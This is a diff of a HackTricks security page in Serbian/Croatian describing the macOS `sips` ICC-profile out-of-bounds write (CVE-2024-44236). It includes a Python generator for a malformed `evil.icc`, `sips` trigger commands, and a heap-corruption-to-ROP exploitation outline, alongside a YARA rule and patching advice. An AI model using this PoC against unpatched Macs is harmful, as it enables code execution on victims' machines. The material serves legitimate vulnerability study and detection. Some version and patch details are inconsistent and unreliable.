diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md index 611f0d3b4..35e0b035e 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md @@ -1,53 +1,97 @@ -# WWW2Exec - sips ICC profil vanrednog pisanja (CVE-2024-44236) +# WWW2Exec - sips ICC profil vanjski zapis (CVE-2024-44236) {{#include ../../banners/hacktricks-training.md}} ## Pregled -Ranljivost vanrednog pisanja u Apple macOS Scriptable Image Processing System (`sips`) parseru ICC profila (macOS 15.0.1, sips-307) zbog nepravilne validacije polja `offsetToCLUT` u `lutAToBType` (`mAB `) i `lutBToAType` (`mBA `) oznakama. Prilagođena ICC datoteka može izazvati nulti pisanja do 16 bajtova izvan bafera na hrpi, korumpirajući metapodatke hrpe ili pokazivače funkcija i omogućavajući izvršavanje proizvoljnog koda (CVE-2024-44236). +Ranljivost **zero-write** vanjskog zapisa u Apple macOS **Scriptable Image Processing System** (`sips`) parseru ICC profila (macOS 15.0.1, `sips-307`) omogućava napadaču da ošteti metapodatke hrpe i preusmeri primitiv u punu izvršavanje koda. Greška se nalazi u obradi polja `offsetToCLUT` oznaka `lutAToBType` (`mAB `) i `lutBToAType` (`mBA `). Ako napadači postave `offsetToCLUT == tagDataSize`, parser briše **16 bajtova nakon kraja bafera hrpe**. Sprejanje hrpe omogućava napadaču da nula-izbriše strukture alokatora ili C++ pokazivače koji će kasnije biti dereferencirani, što dovodi do **arbitrary-write-to-exec** lanca (CVE-2024-44236, CVSS 7.8). + +> Apple je ispravio grešku u macOS Sonoma 15.2 / Ventura 14.7.1 (30. oktobar 2024). Druga varijanta (CVE-2025-24185) ispravljena je u macOS 15.5 i iOS/iPadOS 18.5 1. aprila 2025. ## Ranljivi kod - -Ranljiva funkcija čita i postavlja na nulu 16 bajtova počevši od ofseta koji kontroliše napadač, bez osiguranja da se nalazi unutar alociranog bafera: ```c -// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1) -for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) { -if (i > numberOfInputChannels && buffer[i] != 0) -buffer[i] = 0; +// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1) +if (offsetToCLUT <= tagDataSize) { +// BAD ➜ zero 16 bytes starting *at* offsetToCLUT +for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++) +buffer[i] = 0; // no bounds check vs allocated size! } ``` -Samo se provera `offsetToCLUT <= totalDataLength` vrši. Postavljanjem `offsetToCLUT == tagDataSize`, petlja indeksira do 16 bajtova nakon kraja `buffer`, korumpirajući susedne heap metapodatke. +## Koraci Eksploatacije -## Koraci za eksploataciju +1. **Kreirajte zloćudni `.icc` profil** -1. **Kreirajte zloćudni `.icc` profil:** -- Izgradite ICC header (128 bajtova) sa potpisom `acsp` i jednim `lutAToBType` ili `lutBToAType` tag unosa. -- U tabeli tagova, postavite `offsetToCLUT` jednak `size` tag-a (`tagDataSize`). -- Postavite podatke pod kontrolom napadača odmah nakon bloka podataka tag-a kako biste prepisali heap metapodatke. -2. **Pokrenite parsiranje:** +* Postavite minimalni ICC header (`acsp`) i dodajte jedan `mAB ` (ili `mBA `) tag. +* Konfigurišite tabelu tagova tako da **`offsetToCLUT` bude jednak veličini taga** (`tagDataSize`). +* Postavite podatke pod kontrolom napadača odmah nakon taga tako da 16 nula pisanja preklapa metapodatke alokatora. + +2. **Pokrenite parsiranje sa bilo kojom sips operacijom koja dodiruje profil** ```bash -sips --verifyColor malicious.icc +# putanja za verifikaciju (nije potreban izlazni fajl) +sips --verifyColor evil.icc +# ili implicitno prilikom konvertovanja slika koje sadrže profil +sips -s format png payload.jpg --out out.png ``` -3. **Korupcija heap metapodataka:** OOB nulti-pisanja prepisuju metapodatke alokatora ili susedne pokazivače, omogućavajući napadaču da preuzme kontrolu nad tokom izvršavanja i postigne proizvoljno izvršavanje koda u kontekstu `sips` procesa. +3. **Kvar metapodataka na heap-u ➜ proizvoljno pisanje ➜ ROP** +Na Apple-ovom podrazumevanom **`nano_zone` alokatoru**, metapodaci za 16-bajtne slotove se nalaze **odmah nakon** poravnate 0x1000 slab. Postavljanjem taga profila na kraj takvog slaba, 16 nula-pisanja uništava `meta->slot_B`. Nakon narednog `free`, otrovani pokazivač se dodaje u malu slobodnu listu, omogućavajući napadaču **da alocira lažni objekat na proizvoljnoj adresi** i prepiše C++ vtable pokazivač koji koristi sips, konačno preusmeravajući izvršenje na ROP lanac smešten u zloćudnom ICC baferu. +### Brzi PoC generator (Python 3) +```python +#!/usr/bin/env python3 +import struct, sys + +HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding) +TAGS = [(b'mAB ', 132, 52)] # one tag directly after header +profile = HDR +profile += struct.pack('>I', len(TAGS)) # tag count +profile += b''.join(struct.pack('>4sII', *t) for t in TAGS) + +mab = bytearray(52) # tag payload (52 bytes) +struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start) +profile += mab + +open('evil.icc', 'wb').write(profile) +print('[+] Wrote evil.icc (%d bytes)' % len(profile)) +``` +### YARA pravilo za detekciju +```yara +rule ICC_mAB_offsetToCLUT_anomaly +{ +meta: +description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)" +author = "HackTricks" +strings: +$magic = { 61 63 73 70 } // 'acsp' +$mab = { 6D 41 42 20 } // 'mAB ' +$mba = { 6D 42 41 20 } // 'mBA ' +condition: +$magic at 0 and +for any i in (0 .. 10): // up to 10 tags +( +($mab at 132 + 12*i or $mba at 132 + 12*i) and +uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size +) +} +``` ## Uticaj -Uspešna eksploatacija rezultira daljinskim proizvoljnim izvršavanjem koda sa privilegijama korisnika na macOS sistemima koji pokreću ranjivu `sips` alatku. +Otvaranje ili obrada kreiranog ICC profila dovodi do daljinskog **izvršavanja proizvoljnog koda** u kontekstu korisnika koji ga pokreće (Preview, QuickLook, renderovanje slika u Safariju, priloge u Mail-u, itd.), zaobilazeći Gatekeeper jer se profil može ugraditi unutar inače benignih slika (PNG/JPEG/TIFF). -## Detekcija +## Detekcija i ublažavanje -- Pratite prenose datoteka na uobičajenim protokolima (FTP, HTTP/S, IMAP, SMB, NFS, SMTP). -- Istražite prenesene datoteke sa potpisom `acsp`. -- Za svaki `mAB ` ili `mBA ` tag, proverite da li polje `Offset to CLUT` jednako `Tag data size`. -- Obeležite kao sumnjivo ako je ovaj uslov ispunjen. +* **Zakrpite!** Osigurajte da host radi na macOS ≥ 15.2 / 14.7.1 (ili iOS/iPadOS ≥ 18.1). +* Implementirajte YARA pravilo iznad na email prolazima i EDR rešenjima. +* Uklonite ili sanirajte ugrađene ICC profile pomoću `exiftool -icc_profile= -overwrite_original ` pre daljnje obrade nepouzdanih fajlova. +* Ojačajte Preview/QuickLook pokretanjem unutar sandboxovanih “transparentnost i modernizacija” VM-ova prilikom analize nepoznatog sadržaja. +* Za DFIR, tražite nedavnu izvršavanje `sips --verifyColor` ili učitavanje `ColorSync` biblioteka od strane sandboxovanih aplikacija u ujedinjenom logu. ## Reference -- ZDI blog: CVE-2024-44236: Ranljivost daljinskog izvršavanja koda u Apple macOS sips alatki -https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos -- Apple oktobar 2024. Bezbednosno ažuriranje (zakrpa koja isporučuje CVE-2024-44236) -https://support.apple.com/en-us/121564 +* Trend Micro Zero Day Initiative savetovanje ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)” +https://www.zerodayinitiative.com/advisories/ZDI-24-1445/ +* Apple sigurnosne ažuriranja HT213981 “O sadržaju sigurnosti macOS Sonoma 15.2” +https://support.apple.com/en-us/HT213981 {{#include ../../banners/hacktricks-training.md}}